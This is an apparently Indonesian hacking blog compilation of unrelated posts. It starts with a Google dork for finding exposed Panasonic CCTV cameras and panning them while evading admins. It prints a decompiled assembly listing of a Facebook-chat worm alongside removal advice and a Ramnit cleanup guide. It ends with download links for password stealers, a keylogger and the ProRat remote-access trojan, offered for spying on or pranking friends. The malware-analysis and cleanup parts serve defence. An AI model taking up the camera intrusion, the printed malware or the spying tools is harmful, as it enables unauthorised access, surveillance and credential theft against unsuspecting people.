HACKING CCTV PANASONIC
awalnya sih hanya iseng pingin lihat cctv online punya DLLAJ dan kepolisian. eh ternyata disitusnya bukan yg real time tetapi direkam diserver kemudian baru diupload kewebsite. nah dari situlah saya pingin langsung dapetin gambar secara real time tanpa harus masuk kesebuah website.
setelah googling sana sini dapat beberapa ip cctv yang memang sudah di publish sama yg bikin blog. cuma dipikir pikir kok cuma sedikit. jadi ga puas deh.
nah untuk lebih jelasnya simak caranya sebagai berikut :
1. ketikan di google ==> inurl:CgiStart?page=
2. biasanya google akan merespon anda dengan lalulintas komunikasi yang tidak layak. dan disuruh memasukan kata kata tertentu. kamu ikuti saja. biasanya google akan meminta 2x verifikasi kata.
3. nah tara..... setelah melewati verifikasi dari google munculah banyak pilihan. pilih aja salah satu.
4. jreng.... munculah cctv target....
5. ada beberapa yg bisa kita ambil kendali termasuk digeser kanan dan kiri, atas serta bawah. tapi jangan ketahuan admin yah... bisa di ban ip kamu.
ok sekian tutorial hacking cctv online. gunakan dengan bijak yah
pernahkah kamu mendapat chat seperti diatas? atau yang seperti dibawah ini?
berhati hatilah karena chat tersebut sebenarnya sedang mengirimkan link untuk mendownload virus. kamu jangan tergoda dengan file .JPG karena sebenarnya bukan foto sama sekali melainkan file virus dengan aplikasi ms.dos.
virus tersebut dibuat dengan menggunakan bahasa assembly. berikut adalah hasil decompile dari si virus tersebut:
n004010EF()
push ebp
mov ebp,esp
sub esp,10
push ebx
push esi
xor ecx,ecx
xor esi,esi
push edi
mov dword ptr [ebp-0C],ecx
xor ebx,ebx
l00401101:
mov eax,ecx
cdq
push 0F
pop edi
idiv edi
mov byte ptr [ecx+00417DB0],cl
inc ecx
cmp ecx,00000100
mov al,[edx+00416FC4]
mov byte ptr [ecx+004182BF],al
jl 00401101
l00401191:
inc bx
mov eax,eax
or bx,ax
dec bl
ror cl,1C
dec eax
sub cx,ax
sub eax,00
inc eax
xor eax,ebx
not bl
neg bx
inc ebx
mov bx,bx
xor cl,al
sub eax,ecx
xor bl,F6
nop
inc esi
and esi,edi
movzx eax,byte ptr [esi+00417DB0]
add eax,[ebp-0C]
and eax,edi
mov dword ptr [ebp-0C],eax
lea eax,[eax+00417DB0]
mov cl,[eax]
xor byte ptr [esi+00417DB0],cl
mov cl,[esi+00417DB0]
xor byte ptr [eax],cl
mov cl,[eax]
xor byte ptr [esi+00417DB0],cl
movzx eax,byte ptr [eax]
movzx ecx,byte ptr [esi+00417DB0]
add eax,ecx
mov ecx,[ebp+08]
and eax,edi
mov dl,[eax+00417DB0]
mov eax,[ebp-08]
add eax,ecx
cmp dl,[eax]
mov byte ptr [00417A71],dl
mov dword ptr [ebp-10],eax
jnz 00401219
l00401211:
xor dl,dl
mov byte ptr [00417A71],dl
l00401219:
ror bx,19
not eax
sub al,00
or bx,ax
not ecx
and al,bl
sub bx,1B
ror cx,1B
add ax,cx
ror ecx,10
and cx,FF
add eax,000000B2
neg ecx
xor al,cl
or bl,1D
shl bl,12
sar bl,14
and ax,FFFF
and eax,ecx
not eax
dec ebx
or eax,ecx
not cl
ror bx,02
shl ebx,03
or eax,00
shl bl,1B
ror bl,0D
sub al,00
xor cx,ax
ror ecx,1C
or eax,00
add al,00
not ecx
inc cl
not bx
inc bx
sar bl,17
ror cl,04
nop
ror cx,05
and ecx,09
ror ebx,15
xor bl,cl
inc ecx
sub eax,00
shl cx,06
and bl,al
inc bx
or bx,00
inc eax
ror bl,10
shl bx,1B
and cx,0D
shl bx,04
shl cl,1A
and ecx,eax
neg bl
nop
inc ebx
and bl,FF
sar cx,13
ror bl,09
sub eax,ebx
ror ebx,19
add eax,3F
not bx
shl ax,13
dec bx
add al,cl
mov eax,[ebp-10]
xor byte ptr [eax],dl
inc dword ptr [ebp-08]
mov eax,[ebp-08]
cmp eax,[ebp-04]
jl 00401191
l004012EC:
mov ebx,[ebp+08]
l004012EF:
pop edi
pop esi
mov eax,ebx
pop ebx
leave
ret
fn004013C4()
mov edx,[004183CC]
push ebx
dec cl
inc bx
or bx,16
shl cx,15
neg ecx
or ax,bx
sub bl,DE
not ecx
ror cl,16
shl ax,1A
shl cx,0B
or eax,04
inc ebx
or eax,ebx
and eax,FF
inc cx
sar al,07
sub bl,cl
ror al,18
and bx,14
sub eax,00
shl bx,0B
and bl,06
add ebx,ecx
and bx,FF
or al,cl
push 00416F38
push edx
call dword ptr [00413014]
mov edx,eax
not ebx
neg eax
add bx,00
not bx
ror cl,09
sar al,1B
shl cl,14
ror bx,0E
inc ecx
ror ax,12
shl bl,18
sub eax,07
and ecx,ebx
nop
shl al,16
ror eax,12
sub cl,02
ror bl,05
ror eax,02
or bx,02
sub bx,00
sar ebx,07
neg eax
xor eax,66
ror cl,1C
neg eax
inc cl
dec ecx
inc eax
and bl,cl
ror eax,0F
mov bl,bl
nop
shl eax,16
neg cl
inc bl
not eax
add ebx,3F
ror ecx,08
sub al,00
nop
shl ecx,09
sar bx,1A
ror bl,0F
and ecx,06
not cl
ror eax,08
not bl
shl eax,04
ror al,0E
sub bl,E7
add cx,62
or ecx,ebx
ror eax,02
and ebx,18
xor ecx,000000E0
or ax,bx
shl bl,10
xor eax,0000009A
sar ecx,13
neg ebx
ror bx,18
neg al
ror ebx,1C
neg ax
push dword ptr [esp+08]
call edx
pop ebx
ret
fn004014DE()
push ecx
push ebx
push ebp
push esi
push edi
mov edi,eax
not bx
ror cl,09
sar al,1B
shl cl,14
ror bx,0E
inc ecx
ror ax,12
shl bl,18
push 00416FD4
call 004010EF
pop ecx
add bl,al
neg eax
xor cl,al
sub bx,00
shl al,14
not cx
mov eax,eax
or ecx,ebx
ror bl,1E
sub al,cl
xor ecx,ebx
sar al,0F
sub bx,0E
or bx,01
neg ax
not ebx
neg eax
add bx,00
push 00416D40
call 004010EF
pop ecx
ror bl,0B
and eax,11
push 00416D64
call 004010EF
pop ecx
inc ebx
dec bl
nop
not ebx
dec eax
neg eax
add eax,00
and eax,FF
and bx,14
add eax,ecx
sub ebx,00
or eax,00
neg cx
or ax,001A
mov bl,bl
xor eax,0000009E
inc cl
push 00416D88
call 004010EF
pop ecx
and cl,bl
add bl,91
shl ebx,14
sub ecx,00
xor ebx,ecx
ror al,01
neg bl
shl ax,1B
ror bx,02
dec bl
ror bl,17
or eax,14
sub al,00
ror ebx,09
neg eax
not bl
xor al,cl
shl eax,0E
push 00416DAC
call 004010EF
pop ecx
not cx
sar bl,01
dec cl
dec al
ror ecx,0F
or bl,cl
add cl,00
ror ecx,07
inc ebx
not eax
sub cx,bx
dec eax
sub eax,00
neg eax
sub cl,00
or bl,00
shl ebx,13
sub ax,bx
not ebx
inc bx
and al,bl
mov bx,bx
neg ecx
sub bx,cx
push 00416DD0
call 004010EF
mov dword ptr [esp],00416DF4
call 004010EF
mov ebp,00416F5C
push ebp
call 004010EF
mov esi,[00413018]
pop ecx
pop ecx
push 00416CB0
call esi
push 00416D1C
mov dword ptr [004183CC],eax
call esi
mov dword ptr [esp+10],eax
and ax,0001
sar bx,14
shl al,09
ror ecx,0B
or bl,00
dec bx
add ebx,ecx
neg eax
ror bl,17
not al
or cx,00
dec ax
ror bl,0E
inc al
push ebp
push dword ptr [004183CC]
call dword ptr [00413014]
mov dword ptr [00417D68],00000044
mov dword ptr [00417A90],00010007
cmp word ptr [edi],5A4D
mov dword ptr [004183C8],edi
jnz 00401773
l00401813:
add bx,cx
push esi
push ebp
call dword ptr [004184E0]
mov edi,eax
and bl,07
cmp edi,ebp
jnz 0040182B
l00401827:
xor ecx,ebx
jmp 00401852
l0040182B:
and cx,ax
push esi
push ebp
call dword ptr [004184DC]
mov dword ptr [004184F8],eax
inc bl
push edi
call dword ptr [004184E4]
mov dword ptr [004184FC],eax
and ecx,eax
mov al,01
jmp 00401854
l0040184F:
ror al,1D
l00401852:
xor al,al
l00401854:
pop edi
pop esi
pop ebp
pop ebx
ret
fn00401859()
push ebx
mov ebx,[004184E8]
push ebp
mov ebp,[004184EC]
push esi
push edi
push 00416CB0
call dword ptr [00413018]
mov esi,[00413014]
mov edi,eax
push 00416ECC
push edi
call esi
push 00416EF0
push edi
mov dword ptr [00417A88],eax
call esi
push 00416F14
push edi
mov dword ptr [004183C0],eax
call esi
test ebx,ebx
mov dword ptr [00417DAC],eax
push ebp
jz 004018B6
---------------------------------------------------------------
Hebatnya, akun Facebook yang di
infeksi oleh virus tidak mengalami perubahan
sama sekali. Bahkan tidak ada pop up FB Chat
yang terbuka. Yang dibutuhkan oleh virus ini
hanyalah akun Facebook tersebut sedang login
saja. Kemungkinan besar hal ini terjadi supaya
korban virus tidak menyadari kalau komputernya
telah terinfeksi oleh Kolab/Click1 dan
menyebarkan banyak sekali FB Chat ke
kontak-kontak Facebooknya yang mengarahkan
untuk mendownload virus ini.
Jika Anda
meng-klik link pada pesan chat tersebut, maka
secara otomatis file akan terdownload ke dalam
komputer Anda. Dan jika Anda menjalankan file
tersebut, maka komputer Anda sudah pasti telah
terinfeksi.
Sulit dibasmi
dan menyebabkan BSOD (Bumi Serpong Ooo
Damai ??.. :p)
Kolab/Click1 tidak berjalan pada proses atau
services Windows, sehingga sulit menemukan dan
mematikan keberadaan worm/rootkit ini. Tetapi,
worm ini justru mendompleng atau menumpang
pada file svchost.exe milik Windows, sehingga
Anda akan sulit mematikan-nya. Jika Anda
memaksa mematikan file svchost.exe, komputer
akan mengalami blue
screen of death / BSOD. Termasuk jika Anda mencoba
melakukan scan menggunakan tools tertentu
seperti GMER, tools yang biasa digunakan untuk
mendeteksi rootkit. (lihat gambar 6)
Gambar 6,
Berusaha mematikan file svchost yang telah
didompleng, akan muncul BSOD
Broadcast ke
IP-IP tertentu
Walaupun tidak berjalan pada
proses atau services Windows, Kolab/Click1 memanfaatkan file svchost.exe
Windows, untuk melakukan broadcast pada IP-IP
tertentu. (lihat gambar 7)
Gambar 7,
Aktivitas broadcast yang dilakukan oleh Kolab/Click1
Mencantumkan
diri-nya pada Windows Firewall
Agar dapat berjalan bebas tanpa
hambatan, Kolab/Click1 mendaftarkan programnya pada
Windows Firewall, sehingga diperbolehkan untuk
melakukan koneksi dan broadcast. (lihat gambar
8)
Gambar 8,
Aktivitas broadcast yang dilakukan oleh Kolab/Click1
Tips Hindari Kolab/Click1
Berikut beberapa tips bagi Anda
jika tidak ingin terinfeksi dan menjadi korban
dari worm/rootkit ini
Hindari melakukan klik pada
link yang dikirim pada Anda, baik melalui
pesan chat FB atau status.
Beritahukan pada teman Anda,
bahwa komputer tersebut telah terinfeksi
virus, dan segera lakukan update dan scan
komputer dengan antivirus yang terupdate.
Jangan melakukan copy link atau melakukan
pemberitahuan disertai link tersebut,
karena dengan begitu Anda justru ikut
menyebarkan link yang mengandung virus
tersebut.
Jangan meninggalkan FB Anda dalam keadaan aktif/login, sebaiknya Anda logout dahulu hingga Anda kembali.
Gunakan Secure HTTP / HTTPS
pada saat Login FB, hal ini agar FB Anda
tidak mudah diakses oleh orang lain
disekitar Anda.
Apa yang harus dilakukan jika sudah terlajur terinfeksi?
Apabila
kita sudah terlanjur menjalankan file virusnya, sudah pasti komputer
yang kita gunakan akan terinfeksi virus tersebut. Beberapa hal yang bisa
kita lakukan sebagai langkah awal pertolongan pertama mungkin bisa
melakukan beberapa langkah berikut:
Tutup
akun facebook ( dalam hal ini Logout dari akun facebook) untuk mencegah
penyebaran lebih banyak ke teman-teman facebook kita.
Pastikan di Komputer anda terinstall program Antivirus (disarankan ativirus luar), dan lakukan update database ke versi paling terbaru.
Matikan koneksi internet, kemudian lakukan full sistem scan di komputer menggunakan Antivirus yang sudah terupdate tadi, jika ada beberapa file yang terdeteksi (biasanya W32/Kolab.xxx atau Trojan.Click1.xxxx) kita bisa menghapusnya atau untuk keamanan kita bisa meng-karantina (quarentine) file yang dicurigai sebagai virus.
Restart komputer. Untuk memastikan keadaan sistem komputer kita, bisa lakukan lagi full sistem scan setelah komputer di restart.
Ini tidak menjamin komputer akan bebas 100% dari infeksi virus tersebut, semua tergantung kemampuan dari masing-masing antivirus yang digunakan. Dari
beberapa sumber mengatakan, w32/kolab yang menyebar melaui chat
facebook ini merupakan varian terbaru dari worm kolab (worm jaringan)
yang sudah lama menyebar. Jadi untuk saat ini masih sulit dibersihkan.
Berikut ini saya sertakan hasil deteksi beberapa antivirus terhadap virus tersebut.
Memang Virus Ramnit adalah Virus yang sangat cepat penularannya , tetapi bagaimanapun hebatnya sesuatu pasti ada kelemahannya….
Disini saya akan menjelaskan dengan tuntas bagaimana Virus ramnit bekerja… sekaligus cara mengatasinya…
Virus Ramnit.. :
Virus yang menginjeksi file .html , .exe dan .dll
Virus yang menular melalui removable disk ( UFD ) dengan cara mengcopy file .cpl dan .exe yang selalu bertambah dan berubah-ubah namanya.Yang tepatnya file tersebut berada di dalam folder Recycler… dan 4 file shortcut copy of yang akan menjalankan file *.cpl infektor yang terdapat di folder recycler UFD.
Bila Virus tersebut telah meng-infeksi system komputer , virus tersebut akan membuat dan menjalankan file svchost.exe yang akan melakukan berbagai hal: a. membuat file bernama : watermark.exe yang bertempat di folder : C:\programfiles\mikrosoft\watermark.exe. b. merubah registry userinit.exe mejadi menjalankan : watermark.exe , sehingga virus tersebut menguasai sistem secara permanen , dengan cara menginfeksi file berekstensi .exe , . dll dan .html
Jika di properties , UFD akan terlihat banyak terpakai oleh file .cpl dan .exe di folder recycler.
Efeknya:
Virus ramnit akan membuat file program tidak berjalan dengan normal , misalnya: mozilla firefox , winamp dll
kita tidak bisa menghapus file watermark.exe yang ada difolder c:\programfiles\microsoft\watermark.exe , dikarenakan file tersebut dikunci oleh file svchost.exe-nya virus ramnit.
bila kita hapus file / folder yang ada didalam folder recycler UFD , file .cpl dan .exe akan muncul kembali.. dan terus menulis kembali…
untuk system yangtelah terinfeksi file tertentu.. misalnya : explorer.exe akan digantikan explorermgr.exe
bila kita membersihkan virus ini tidak tuntas ( ada yang belum dibersihkan ) , Virus ini akan kembali bila kita menjalankan aplikasi ( misalnya : klik kanan ).
Cara membersihkannya:
Siapkan cleaner Anti Virus ( saya menggunakan NOD32 stand alone ) dengan cara >download disini< dan simpan dalam bentuk file zip / RAR agar file exe tersebut tidak terinfeksi virus.
Simpan file tersebut di UFD atau copy paste di harddisk komputer yang telah terinfeksi.
Gunakan task manager , pilih task / tab processes dan end task semua file svchost.exe dan juga semua yang bisa di end task ( kecuali : task managernya )
Open file cleaner NOD32 yang sudah berbentuk zip /RAR , dengan menggunakan file open di task manager.Rubah pilihan program di open file menjadi allfiles agar file zip / rar dari NOD32 bisa terlihat.
setelah teropen NOD32 dengan winrar atau aplikasi lainnya.. silakan dobel klik file nod*.exe setelah next…next dipilihan action , sebelah kiri pilih Clean dan sebelah kanan pilih delete.Lalu jalankan Scan & clean
setelah berjalan close / tutup winrar / aplikasi yang dibuat membuka NOD32 zip / RAR.
Silakan diawasi dengan task manager bila ada file svchost.exe keluar / tampil di processes segera di end task… dan seperti biasa bila ada tampilan windows yang memperingatkan bahwa komputer akan shutdown dalam waktu 60 detik / 1 menit…. silakan ketik di menu file open /run : shutdown -a yang artinya -a adalah perintah shutdown untuk membatalkan aksinya…
Peringatan!!!!! , disaat NOD 32 membersihkan file di komputer anda , jangan sampai membuka / menjalankan file apapun… karena jangankan menjalankan file exe , kita klik kanan aja sudah berarti menjalankan virus / svchost.exe-nya Virus Ramnit.
Ingat… yang perlu kita jaga adalah : mematikan / end task file svchost.exe selama NOD32 membersihkan file di komputer kita…..
Antisipasi Virus RAmnit:
Untuk menjaga Virus sejenis ramnit agar tidak kembali meng-infeksi komputer kita… disini saya sertakan berbagai trik… diantaranya:
Matikan autorun.inf windows bisa berbagai macam cara : dengan menggunakan gpedit.msc>>administrative template>>turn off auto play>>enable>>alldrive , atau menggunakan regedit silakan baca : agar virus tidak masuk melalui flash disk
Rubah beberapa ektensi file yang berpotensi digunakan oleh virus dengan assosiasi file ( misalnya: assoc .vbs=txtfile ) terutama untuk Virus ramnit adalah ekstensi .cpl
Hapus selalu folder recycler didalam UFD , bila tidak bisa ada kemungkinan komputer kita terinfeksi Virus…
Dan hapus dengan menggunakan mini windows Xp ( hiren BOOt CD ) atau system berbasis linux , folder recycler dan _restore yang ada di folder systeminformation
Install Anti virus dengan Update database terbaru… dan usahakan anti viru tersebut diupdate databasenya.. baik secara online ataupu offline..
Disini saya sertakan beberapa file buatan saya yang berfungsi untuk mempermudah setting windows…
Untuk yg sdah mengenal dunia deface mungkin tutorial ni sangatlah tidak asing lagi...B Tapi bwat yang newbie mungkin ini sangat bermanfaat....silahkan disedot video'y tutor'y
Pernah dengar tentang program mata mata yang biasa dipakai oleh FBI dan agen rahasia lainya?
berikut ini akan saya berikan 2 buah program mata mata (spy)
1. pasword fox, program ini akan menunjukan semua jenis pasword yang terekam pada firefox. cara kerjanya yaitu anda tinggal klik file aplikasinya maka program ini akan otomatis mencari pasword dari user yang pernah menggunakan firefox tersebut. berhati hatilah jika ada teman kamu yang pinjam laptopmu. bisa jadi di flashdisknya ada program ini. karena programnya yg portabel sehingga dapat disimpan di FD dan tinggal dijalankan saja.
2. google pasword decripter, program ini juga hampir sama dengan yang diatas hanya ada 2 macam yg portabel dan non portabel.
program diatas sangat berbahaya dan saya tidak bertanggungjawab atas pemakaian oleh orang yang tidak bertanggung jawab.
saran saya jangan pernah klik remember / ingat saya pada saat anda log in di sebuah website dengan user name dan paswordnya
oh iya ini saya masih punya 11 tools mata mata yang biasa dipakai oleh agen FBI dan agen rahasia lainya silahkan kalian pelajari sendiri heheheheh. males jelasinya kebayakan. silahkan download di : http://www.ziddu.com/download/15384974/11FBITools.rar.html
saya tidak bertanggung jawab atas pemakaian dan penggunaan program ini. jika anda memakai berarti anda paham akan resikonya
sudah pernah dengar keyloger ? yah program yang dapat merekam semua aktivitas yang kita lakukan. baik membuka program menulis email maupun mamasukan pasword dan program ini berjalan tanpa diketahui oleh pemilik komputer. berhati hatilah jangan sampai komputer kamu disisipi program ini karena semua rahasiamu akan terbongkarbagi yang ingin mencoba keyloger silahkan download di :http://www.ziddu.com/download/15384668/setup.exe.html
Bagi kamu yang suka iseng ngejahilin komputer teman, nih aku kasih tools yang cocok buat kamu. Namanya ProRat. ProRat adalah salah satu tool hacking yang sangat luar biasa sekali. Tools ini buatan orang Turkey. Tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban saja, maka kita dapat langsung menginfeksinya. Selamat mencoba download Disini